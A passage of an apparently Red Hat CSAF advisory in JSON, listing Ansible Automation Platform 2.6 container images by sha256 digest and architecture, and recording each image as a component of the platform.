"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3Af00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
